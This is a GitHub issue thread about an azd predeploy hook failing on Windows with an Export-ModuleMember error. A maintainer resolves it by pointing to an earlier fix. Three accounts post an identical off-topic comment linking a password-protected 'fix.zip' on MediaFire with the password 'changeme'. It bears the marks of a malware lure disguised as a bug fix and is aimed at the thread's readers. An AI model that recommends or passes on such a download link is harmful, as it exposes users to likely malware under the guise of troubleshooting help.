### ISSUE TITLE
(x) Failed: Deploying service webapp in Windows 

### ISSUE THREAD

**Issue by rajaveernapu** [Azure-Samples/serverless-chat-langchainjs#97]
> ## Please provide us with the following information:

ERROR: error executing step command 'deploy --all': failed deploying service 'webapp': failed invoking event handlers for 'predeploy', 'predeploy' hook failed with exit code: '1', Path: 'C:\Users\raj\AppData\Local\Temp\azd-predeploy-3922750041.ps1'. : exit code: 1, stdout: , stderr: Export-ModuleMember: C:\Users\raj\AppData\Local\Temp\azd-predeploy-3922750041.ps1:4:1
Line |
   4 |  Export-ModuleMember -Variable API_URL && npm run build
     |  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | The Export-ModuleMember cmdlet can only be called from inside a module.

### This issue is for a: (mark with an `x`)

```
- [x] bug report -> please search issues before submitting
- [ ] feature request
- [ ] documentation issue or request
- [ ] regression (a behavior that used to work and stopped in a new release)
```

### Minimal steps to reproduce
When I run the AZD Up, everything is working in terms of deploying resources but it is failing in deploying webapp.

>

### Any log messages given by the failure

ERROR: error executing step command 'deploy --all': failed deploying service 'webapp': failed invoking event handlers for 'predeploy', 'predeploy' hook failed with exit code: '1', Path: 'C:\Users\raj\AppData\Local\Temp\azd-predeploy-3922750041.ps1'. : exit code: 1, stdout: , stderr: Export-ModuleMember: C:\Users\raj\AppData\Local\Temp\azd-predeploy-3922750041.ps1:4:1
Line |
   4 |  Export-ModuleMember -Variable API_URL && npm run build
     |  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | The Export-ModuleMember cmdlet can only be called from inside a module.
>

### Expected/desired behavior

>

### OS and Version?

> Windows 7, 8 or 10. Linux (which distribution). macOS (Yosemite? El Capitan? Sierra?)

### Versions
Node : v22.5.1
PowerShell : PowerShell 7.4.5
Windows 11
azd version 1.9.5
>

### Mention any other details that might be useful

> ---
>
> Thanks! We'll be in touch soon.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sinedied** [comment]
Could you update your repo and retry? This was fixed in #93

**Comment by rajaveernapu** [comment]
Its working after upgrade. Thank you
